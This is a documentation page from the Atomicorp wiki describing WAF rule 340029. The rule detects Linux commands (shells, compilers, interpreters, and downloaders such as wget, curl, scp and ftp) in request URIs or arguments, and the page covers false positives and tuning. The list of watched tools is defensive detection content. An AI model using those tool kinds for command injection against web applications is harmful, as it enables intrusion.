WAF 340029

From Atomicorp Wiki
Jump to: navigation, search
Rule 340029
Status Active
Alert Message Atomicorp.com WAF Rules: Possible command in REQUEST_URI or Argument

Contents

Description

This rule detects when a Linux command is used in a URL or an argument. It specifically looks for these types of commands:

  • process management tools (kill, nice, etc.)
  • file management tools (cp, chown, rm, etc.)
  • shells (bash, tcsh, etc.)
  • compilers (gcc, c++, etc.)
  • web downloading tools (wget, curl, etc.)
  • interpreters (perl, php, etc.)
  • other downloading tools (scp, ftp, etc.)


Some attack tools are known to blindly look for software tools and to see if it can use them. Therefore, the fact that this rule is triggered does not mean that the software tool is installed on the system.

If your system is being targeted with these kinds of attacks we do not recommend you disable this rule. This rule may be telling you that someone is attacking your system, and therefore you should block this source. Please see the blog post referenced below for information about leaving rules enabled for applications you may not have installed.

Troubleshooting

False Positives

A false positive could occur if an application either safely allows the use of these tools, or if the data is used in a non-command context such as in a document. The rule contains a large number of known safe applications that may either use these tools securely, or may allow this data in non-command mode. If you have confirmed that your application is safely using these commands, or this data in a non-command format, please let us know what the application is, how you confirmed this so we can duplicate this in our test environment, and report the issue as a False Positive per the article below:

https://www.atomicorp.com/wiki/index.php/Reporting_False_Positives#WAF.2FModsecurity_rules_False_Positives

Tuning Guidance

If you want to disable this rule, please see the Tuning the Atomicorp WAF Rules page for basic information.

Additional Information

Blog Articles

None.

Similar Rules

None.

Knowledge Base Articles

None.

Outside References

None.

Notes

Personal tools